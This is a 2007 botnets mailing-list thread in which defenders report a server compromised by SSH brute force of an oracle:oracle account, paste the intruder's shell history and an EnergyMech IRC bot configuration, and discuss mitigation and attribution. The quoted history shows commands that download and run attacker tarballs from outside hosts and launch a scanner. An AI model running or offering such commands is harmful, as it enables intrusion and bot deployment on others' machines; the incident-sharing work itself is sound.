Re: [botnets] mech config captured today
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- yes, i was a ssh bruteforce. user installed oracle client recently, and forget to change a password ;(( it was oracle:oracle bodik Adriel Desautels wrote: > How did they get in? > > Regards, > Adriel T. Desautels > >> access was gained by very very weak password, and standard procedure >> comes, download bot, ssh cracker, spam tool ... ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mech config captured today
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] --bodik wrote: > > yes, i was a ssh bruteforce. user installed oracle client recently, and > forget to change a password ;(( it was oracle:oracle After all this time I don't know how come stupid administrators are given access to administrate machines. How hard can it be to block in all (iptables, ipfw, ipf, etc) to ssh minus the ones that need access. It boggles me. How hard was it to find and install something easily found on the Internet (ossec) to mitigate against this? About 1 minute ./install Some of these compromised businesses need to start giving idiot admins the boot. Sorry if its off-topic, harsh, etc., but man experience, training, common sense sure go a long way. J. Oquendo SGFA (FW+VPN v4.1) SGFE (FW+VPN v4.1) "I hear much of people's calling out to punish the guilty, but very few are concerned to clear the innocent." Daniel Defoe http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xF684C42E smime.p7s Description: S/MIME Cryptographic Signature ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mech config captured today
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Just taking a wild stab in the dark, I'd bet on SSH brute force. A number of groups on Undernet (Romanian ones especially) are known to SSH brute force attack boxes and then install mech and put up a bunch of clones in an IRC channel from the box. Here's a nice example of the classic scenario (sometimes it's more automated though): http://lists.virus.org/dshield-0407/msg00193.html Steven On Fri, 16 Nov 2007 12:08:49 -0500, Adriel Desautels <[EMAIL PROTECTED]> wrote: > To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > -- > ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mech config captured today
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] --How did they get in? Regards, Adriel T. Desautels Chief Technology Officer Netragard, LLC. Office : 617-934-0269 Mobile : 617-633-3821 http://www.linkedin.com/pub/1/118/a45 --- Netragard, LLC - http://www.netragard.com - "We make IT Safe" Penetration Testing, Vulnerability Assessments, Website Security bodik wrote: > To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > -- > Hi, > > we've found one instance of bot from someone called Drow (tools were > compiled but not stripped somewhere in /home/drow ... ;))). Probably a > spanish speaking person. > > Undernet admins should take a look down below and check their servers. > if there are listening here .. > > access was gained by very very weak password, and standard procedure > comes, download bot, ssh cracker, spam tool ... > > was a kiddie, comes from 89.123.217.233, no with no cleanup and probably > a manual job .. > > cut history > > passwd > > ps x > > cd /tmp > > w > > ps x > > cd /tmp > > wget freewebs.com/staycu/stayku.tar > > tar xzvf stayku.tar > > cd .staycu > > ./linux > > cat /proc/cpuinfo > > cd /var/tmp/delles > > cd /var/tmp > > wget http://www.geocities.com/demonfire_16/delles.tar.gz > > tar xzvf delles.tar.gz > > cd delles > > ./a 200.62 > > nohup ./start 59 >> /dev/null & > > cd /var/tmp/delles > > cat vuln.txt > > ps x > > cd /var/tmp/delles > > cat vuln.txt > > ps x > > cd /var/tmp/delles > > cat vuln.txt > ... > ... > cut history > > bodik > > cut > > # Boqdan`S EnergyMech configuration file > # v2.9.3 - Boqdan > > # Linking # > #ENTITYemech > #LINKPASS abc123 > #LINKPORT 49152 > #LINK hismech a1b2c3 mech.host.net 49152 > #LINK hermech abcdefg 0 0 > AUTOLINK > > # Server List > SERVER diemen.nl.eu.undernet.org 6660 > SERVER diemen.nl.eu.undernet.org 6667 > SERVER diemen.nl.eu.undernet.org 6669 > SERVER lelystad.nl.eu.undernet.org > SERVER lelystad.nl.eu.undernet.org 6667 > SERVER lelystad.nl.eu.undernet.org 6668 > SERVER london2.uk.eu.undernet.org 6660 > SERVER london2.uk.eu.undernet.org 6669 > SERVER london2.uk.eu.undernet.org 7000 > SERVER graz.at.eu.undernet.org 6660 > SERVER graz.at.eu.undernet.org 6670 > SERVER graz.at.eu.undernet.org 7000 > SERVER helsinki.fi.eu.undernet.org > SERVER helsinki.fi.eu.undernet.org 6669 > SERVER helsinki.fi.eu.undernet.org 7000 > SERVER montreal.qc.ca.undernet.org 6665 > SERVER montreal.qc.ca.undernet.rog 6669 > SERVER montreal.qc.ca.undernet.org 7000 > SERVER oslo2.no.eu.undernet.org 6660 > SERVER oslo2.no.eu.undernet.org 6669 > SERVER oslo2.no.eu.undernet.org 7000 > > > > # SERVER 1.2.3.4 6667 ThisIsMyPassword > # SERVER 192.168.100.16669 moo:eu.undernet.org:6667 > > # Bot 1 Configuration # > NICK Boqdan > USERFILE 1 > CMDCHAR - > LOGIN gat > IRCNAME tundd > MODES +ix-ws > #VIRTUAL > #NOSEEN > > HASONOTICE 1 # Yes for Undernet. > TOG CC 1 # We want the bot to require command character > TOG CLOAK 1 # Ignore CTCP's from non-users? Yes. > TOG SPY 1 # Tell who is executing what in the partyline. > SET OPMODES 6 # How many modes in a line? 6 on undernet... > SET BANMODES6 # How many bans in a line? 6 on undernet... > SET CTIMEOUT60 # Server connection timeout > SET CDELAY 30 # Delay between connection attempts > > CHANNEL #staycu.com # Channel name > TOG PUB 1 # Allow public(in-channel) commands? Yes. > TOG MASS1 # Do mass-mode/kick/ban checks... > TOG SHIT1 # Activate the shitlist for this channel > TOG PROT1 # Activate protection of users > TOG ENFM0 # Dont enforce channel modes. > SET MDL 5 # How many -o before killing the guy? > SET MKL 5 # How many kicks? > SET MBL 5 # And how many Bans? > SET MPL 1 # What to do with massmoders? > # 0 = nothing, > # 1 = kick the bastard, > # 2 = kickban 'em, > # 3 = kickban & shitlist them. > # END BOT 1 # > > # Bot 2 Configuration # > > NICK Guapo > USERFILE 1 > CMDCHAR - > LOGIN lmess > IRCNAME mesaju > MODES +ix-ws > #VIRtual > #NOSEEN > > HASONOTICE 1 # Yes for Undernet. > TOG CC 1 # We want the bot to require command character > TOG CLOAK 1 # Ignore CTCP's from non-users? Yes. > TOG SPY 1 # Tell who is executing what in the partyline. > SET OPMODES 6 # How many modes in a line? 6 on undernet... > SET BANMODES6 # How many bans
Re: [botnets] mech config captured today
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Hello all. This is my first post, so excuse me if I didn't follow some of the etiquette and please kindly show me the right direction ;) Anyway, I just wanted to say that this one is from our neck of the woods (ie. Romania), since the IP given is from Bucharest, the capitol of Romania. Also, a quick lookup (http://www.dnsstuff.com/tools/whois.ch?ip=89.123.217.233) reveals that the IP belongs to the Romanian Telecom provider RomTelecom. However the kid may be localized anywhere in the country, since RomTelecom uses the exit point in Bucharest for all of their ADSL lines. Also, all of the text in the binaries which isn't in English, is in Romanian. Some more hints: The binaries contain references to the Undernet channel #Linux-Team which is invite only as of this moment. Other people mentioned by nickname are: MiKuTuL (this means "the small one" in Romanian, although it is not written correctly), Serano, Cortez, Arni neam, Gluu, BadBoys. The text also contains references to "unguri satmareni", which means: "the hungarians from Satu-Mare", Satu Mare being a county of Romania (http://www.satu-mare.ro/). If you search for "unguri satmareni", you will get two other complaints of servers being hacked. Hope this was helpful. Best regards. -- Attila-Mihaly BALAZS Virus Researcher BitDefender -- Email: [EMAIL PROTECTED] Phone: +40 264 443 008 -- www.bitdefender.com -- The content of this message and attachments are confidential and are classified as BitDefender's Proprietary Information. The content of this message is intended solely for the use of the individual or entity to whom it is addressed and others authorized to receive it. If you are not the intended recipient you are hereby notified that any disclosure, copying, distribution or taking any action based on this information are strictly prohibited and may be precluded by law. If you have received this message in error, please notify us immediately and then delete it from your system. BitDefender SRL is neither liable for the proper and complete transmission of the information contained in this message nor for any delay in its receipt. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] mech config captured today
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Hi, we've found one instance of bot from someone called Drow (tools were compiled but not stripped somewhere in /home/drow ... ;))). Probably a spanish speaking person. Undernet admins should take a look down below and check their servers. if there are listening here .. access was gained by very very weak password, and standard procedure comes, download bot, ssh cracker, spam tool ... was a kiddie, comes from 89.123.217.233, no with no cleanup and probably a manual job .. cut history passwd ps x cd /tmp w ps x cd /tmp wget freewebs.com/staycu/stayku.tar tar xzvf stayku.tar cd .staycu ./linux cat /proc/cpuinfo cd /var/tmp/delles cd /var/tmp wget http://www.geocities.com/demonfire_16/delles.tar.gz tar xzvf delles.tar.gz cd delles ./a 200.62 nohup ./start 59 >> /dev/null & cd /var/tmp/delles cat vuln.txt ps x cd /var/tmp/delles cat vuln.txt ps x cd /var/tmp/delles cat vuln.txt ... ... cut history bodik cut # Boqdan`S EnergyMech configuration file # v2.9.3 - Boqdan # Linking # #ENTITYemech #LINKPASS abc123 #LINKPORT 49152 #LINK hismech a1b2c3 mech.host.net 49152 #LINK hermech abcdefg 0 0 AUTOLINK # Server List SERVER diemen.nl.eu.undernet.org 6660 SERVER diemen.nl.eu.undernet.org 6667 SERVER diemen.nl.eu.undernet.org 6669 SERVER lelystad.nl.eu.undernet.org SERVER lelystad.nl.eu.undernet.org 6667 SERVER lelystad.nl.eu.undernet.org 6668 SERVER london2.uk.eu.undernet.org 6660 SERVER london2.uk.eu.undernet.org 6669 SERVER london2.uk.eu.undernet.org 7000 SERVER graz.at.eu.undernet.org 6660 SERVER graz.at.eu.undernet.org 6670 SERVER graz.at.eu.undernet.org 7000 SERVER helsinki.fi.eu.undernet.org SERVER helsinki.fi.eu.undernet.org 6669 SERVER helsinki.fi.eu.undernet.org 7000 SERVER montreal.qc.ca.undernet.org 6665 SERVER montreal.qc.ca.undernet.rog 6669 SERVER montreal.qc.ca.undernet.org 7000 SERVER oslo2.no.eu.undernet.org 6660 SERVER oslo2.no.eu.undernet.org 6669 SERVER oslo2.no.eu.undernet.org 7000 # SERVER 1.2.3.4 6667 ThisIsMyPassword # SERVER 192.168.100.16669 moo:eu.undernet.org:6667 # Bot 1 Configuration # NICK Boqdan USERFILE 1 CMDCHAR - LOGIN gat IRCNAME tundd MODES +ix-ws #VIRTUAL #NOSEEN HASONOTICE 1 # Yes for Undernet. TOG CC 1 # We want the bot to require command character TOG CLOAK 1 # Ignore CTCP's from non-users? Yes. TOG SPY 1 # Tell who is executing what in the partyline. SET OPMODES 6 # How many modes in a line? 6 on undernet... SET BANMODES6 # How many bans in a line? 6 on undernet... SET CTIMEOUT60 # Server connection timeout SET CDELAY 30 # Delay between connection attempts CHANNEL #staycu.com # Channel name TOG PUB 1 # Allow public(in-channel) commands? Yes. TOG MASS1 # Do mass-mode/kick/ban checks... TOG SHIT1 # Activate the shitlist for this channel TOG PROT1 # Activate protection of users TOG ENFM0 # Dont enforce channel modes. SET MDL 5 # How many -o before killing the guy? SET MKL 5 # How many kicks? SET MBL 5 # And how many Bans? SET MPL 1 # What to do with massmoders? # 0 = nothing, # 1 = kick the bastard, # 2 = kickban 'em, # 3 = kickban & shitlist them. # END BOT 1 # # Bot 2 Configuration # NICK Guapo USERFILE 1 CMDCHAR - LOGIN lmess IRCNAME mesaju MODES +ix-ws #VIRtual #NOSEEN HASONOTICE 1 # Yes for Undernet. TOG CC 1 # We want the bot to require command character TOG CLOAK 1 # Ignore CTCP's from non-users? Yes. TOG SPY 1 # Tell who is executing what in the partyline. SET OPMODES 6 # How many modes in a line? 6 on undernet... SET BANMODES6 # How many bans in a line? 6 on undernet... SET CTIMEOUT60 # Server connection timeout SET CDELAY 30 # Delay between connection attempts CHANNEL #staycu.com # Channel name TOG PUB 1 # Allow public(in-channel) commands? Yes. TOG MASS1 # Do mass-mode/kick/ban checks... TOG SHIT1 # Activate the shitlist for this channel TOG PROT1 # Activate protection of users TOG ENFM0 # Dont enforce channel modes. SET MDL 5 # How many -o before killing the guy? SET MKL 5 # How many kicks? SET MBL 5 # And how many Bans? SET MPL 1 # What to do with massmoders? # 0 = nothing, # 1 = kick the bastard, # 2 = kickban 'em, # 3 = kic
